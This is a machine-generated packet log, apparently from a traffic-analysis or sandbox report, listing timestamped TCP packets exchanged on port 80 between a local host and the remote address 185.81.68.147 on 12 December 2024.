                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.333945990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.333978891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.334038973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.335441113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.335541010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.335587978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.336947918 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.337052107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.337151051 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.338424921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.338638067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.338685036 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.339960098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.340008020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.340050936 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.341450930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.341559887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.341662884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.342947006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.343050003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.343101978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.344459057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.344516993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.344620943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.345988989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.346085072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.346137047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.347420931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.347568989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.347619057 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.348936081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.349426031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.349538088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.350428104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.350497007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.350543976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.351937056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.352051020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.352099895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.353437901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.353566885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.353667974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.354976892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.355550051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.355597019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.356458902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.356559992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.356659889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.357959986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.357990980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.358042002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.359472990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.359505892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.359546900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.360981941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.361049891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.361150026 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.362454891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.362543106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.362593889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.363967896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.363996029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.364062071 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.365443945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.365497112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.365595102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.366961002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.367012024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.367068052 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.368443012 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.415978909 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.475858927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.475961924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.476118088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.476344109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.476475954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.476582050 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.477433920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.477638960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.477742910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.478554964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.478660107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.478760958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.479685068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.479731083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.479834080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.480782986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.480839968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.480938911 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.481798887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.481897116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.482006073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.482920885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.483083010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.483185053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.483946085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.483989000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.484086037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.484987020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.485069036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.485161066 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.486028910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.486176014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.486267090 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.487195969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.487354040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.487449884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.488157034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.488214016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.488250971 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.489156008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.489269972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.489309072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.490190983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.490307093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.490354061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.491159916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.491266966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.491364956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.492162943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.492224932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.492275000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.493226051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.493364096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.493402958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.494276047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.494349003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.494388103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.495270014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.495532036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.495634079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.496259928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.496346951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.496388912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.497282982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.497478962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.497530937 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.498296022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.498537064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.498596907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.499336958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.499407053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.499501944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.500284910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.500397921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.500494003 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.501329899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.501353025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.501390934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.502336025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.502434015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.502474070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.503375053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.503542900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.503640890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.504545927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.504705906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.504755020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.505388975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.505614996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.505662918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.506447077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.506494045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.506546974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.507430077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.507448912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.507572889 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.508399963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.508550882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.508662939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.509445906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.509546995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.509598970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.510435104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.510606050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.510657072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.511471033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.511598110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.511702061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.512479067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.512610912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.512708902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.513549089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.513639927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.513741970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.514559031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.514662981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.514707088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.515516996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.515644073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.515742064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.516525984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.516679049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.516777039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.517549992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.517635107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.517682076 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.518593073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.518702984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.518754959 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.519608974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.519732952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.519838095 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.520606041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.520699024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.520800114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.521719933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.521795988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.521845102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.522648096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.522767067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.522814035 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.523691893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.523760080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.523813963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.524663925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.524936914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.525038958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.525696039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.525811911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.525861025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.526679993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.526796103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.526850939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.527733088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.527861118 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.527966022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.528693914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.528789043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.528886080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.529647112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.572185993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.667901993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.668163061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.668266058 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.668380976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.668509960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.668596983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.669081926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.669430971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.669523001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.669995070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.670859098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.670948982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.671030998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.671914101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.672000885 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.672060013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.672070980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.672111988 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.673067093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.673216105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.673300028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.674072981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.674249887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.674334049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.675090075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.675734997 CET8049946185.81.68.147192.168.2.10
